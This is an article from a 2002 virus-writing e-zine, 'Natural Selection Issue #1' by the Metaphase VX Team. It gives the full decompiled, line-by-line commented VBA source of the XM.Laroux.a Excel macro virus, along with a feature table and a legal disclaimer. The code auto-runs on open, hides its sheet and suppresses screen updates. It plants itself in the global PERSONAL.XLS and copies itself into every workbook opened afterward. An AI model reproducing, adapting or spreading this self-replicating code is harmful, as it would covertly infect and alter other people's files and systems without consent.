-=( ---------------------------------------------------------------------- )=- -=( Natural Selection Issue #1 ------------------------------- XM.Laroux.a )=- -=( ---------------------------------------------------------------------- )=- -=( 0 : XM.Laroux.a Features --------------------------------------------- )=- Imports: None Infects: Excel Documents Strategy: Autohooking Document open, resident Compatibility: Excel for Windows 5-7 Saves Stamps: None MultiThreaded: None Polymorphism: None AntiAV / EPO: Small amount of stealth SEH Abilities: None Payload: None -=( 1 : XM.Laroux.a Design Goals ----------------------------------------- )=- XM.Laroux was the first working Excel macro virus discovered in July 1996. The actual virus code consists of two macros called auto_open and check_files. The macros are stored in a hidden datasheet named "laroux". I do not know if the original source has ever been release. I decompiled this from a binary of the actual virus. All REM lines are mine and not part of the orignal binary. This virus works in Excel versions 5 and 7. Also known as: ExcelMacro/Laroux, Excel.Laroux, Laroux Orignal number of lines in module: 51 Orignal module size: 2389 bytes Orignal Module name: laroux -=( 2 : XM.Laroux.a Disclaimer ------------------------------------------- )=- THE CONTENTS OF THIS ELECTRONIC MAGAZINE AND ITS ASSOCIATED SOURCE CODE ARE COVERED UNDER THE BELOW TERMS AND CONDITIONS. IF YOU DO NOT AGREE TO BE BOUND BY THESE TERMS AND CONDITIONS, OR ARE NOT LEGALLY ENTITLED TO AGREE TO THEM, YOU MUST DISCONTINUE USE OF THIS MAGAZINE IMMEDIATELY. COPYRIGHT Copyright on materials in this magazine and the information therein and their arrangement is owned by METAPHASE VX TEAM unless otherwise indicated. RIGHTS AND LIMITATIONS You have the right to use, copy and distribute the material in this magazine free of charge, for all purposes allowed by your governing laws. You are expressly PROHIBITED from using the material contained herein for any purposes that would cause or would help promote the illegal use of the material. NO WARRANTY The information contained within this magazine are provided "as is". METAPHASE VX TEAM do not warranty the accuracy, adequacy, or completeness of given information, and expressly disclaims liability for errors or omissions contained therein. No implied, express, or statutory warranty, is given in conjunction with this magazine. LIMITATION OF LIABILITY In *NO* event will METAPHASE VX TEAM or any of its MEMBERS be liable for any damages including and without limitation, direct or indirect, special, incidental, or consequential damages, losses, or expenses arising in connection with this magazine, or the use thereof. ADDITIONAL DISCLAIMER Computer viruses will spread of their own accord between computer systems, and across international boundaries. They are raw animals with no concern for the law, and for that reason your possession of them makes YOU responsible for the actions they carry out. The viruses provided in this magazine are for educational purposes ONLY. They are NOT intended for use in ANY WAY outside of strict, controlled laboratory conditions. If compiled and executed these viruses WILL land you in court(s). You will be held responsible for your actions. As source code these viruses are inert and covered by implied freedom of speech laws in some countries. In binary form these viruses are malicious weapons. METAPHASE VX TEAM do not condone the application of these viruses and will NOT be held LIABLE for any MISUSE. -=( 3 : XM.Laroux.a ------------------------------------------------------ )=- Sub auto_open() Application.OnSheetActivate = "check_files" 'Default auto run the macro and run the the macro check_files End Sub Sub check_files() c$ = Application.StartupPath 'Get the path for Excel m$ = Dir(c$ & "\" & "PERSONAL.XLS") 'The path of Excel and the file called PERSONAL.XLS 'Personal.xls is the global macro spreadsheet. Macros 'stored there are automatically available to all other 'Excel spreadsheets on the system. If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0 'Do a check for PERSONAL.XLS and set p If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0 'Check if the active modual is less then 0 then make w 1 'if not set it to zero whichfile = p + w * 10 'Add them up and multiply by 10 Select Case whichfile Case 10 'If we got 10 out of our math Application.ScreenUpdating = False 'Do not update the users screen n4$ = ActiveWorkbook.Name 'The Active workbook Sheets("laroux").Visible = True 'Set the sheet laroux to visible Sheets("laroux").Select 'Choose the laroux sheet Sheets("laroux").Copy 'Copy the macro laroux With ActiveWorkbook .Title = "" .Subject = "" .Author = "" .Keywords = "" .Comments = "" End With 'Get the following from the active workbook 'Title, Subject, Author, Keywords, Comments newname$ = ActiveWorkbook.Name 'Set a variable for the the workbook name c4$ = CurDir() 'Get the Current Directory ChDir Application.StartupPath 'Change to the Excel Directory ActiveWindow.Visible = False 'Keep the active window out of sight Workbooks(newname$).SaveAs Filename:=Application.StartupPath & "/" & "PERSONAL.XLS", FileFormat:=xlNormal, Password:="", WriteResPassword:="", ReadOnlyRecommended:=False, CreateBackup:=False 'Copy the macro to the Excel Directory under the name 'PERSONAL.XLS. Without the readonly suggestion announcement, 'and without a backup file. ChDir c4$ 'Change directy back to c4$ Workbooks(n4$).Sheets("laroux").Visible = False 'Hide the sheet laroux on the active workbook Application.OnSheetActivate = "" Application.ScreenUpdating = True 'Set the users screen updating to normal Application.OnSheetActivate = "personal.xls!check_files" 'Run the personal.xls with the macro check_files. Case 1 'If we got 1 out of our math Application.ScreenUpdating = False 'Do not update the users screen n4$ = ActiveWorkbook.Name 'The Active workbook p4$ = ActiveWorkbook.Path 'Directory to the currently open workbook s$ = Workbooks(n4$).Sheets(1).Name 'The active workbook sheet name If s$ <> "laroux" Then 'Check if its greater or less then laroux Workbooks("PERSONAL.XLS").Sheets("laroux").Copy before:=Workbooks(n4$).Sheets(1) 'If so then copy out of the personal.xls the macro 'laroux to the sheet Workbooks(n4$).Sheets("laroux").Visible = False 'Do not show the sheet laroux Else End If 'If equal to laroux Application.OnSheetActivate = "" Application.ScreenUpdating = True 'Set the users screen updating to normal Application.OnSheetActivate = "personal.xls!check_files" 'Run the personal.xls with the macro check_files Case Else 'If Anything Else End Select 'End our Select Case End Sub -=( ---------------------------------------------------------------------- )=- -=( Natural Selection Issue #1 ---------------- (c) 2002 Metaphase VX Team )=- -=( ---------------------------------------------------------------------- )=-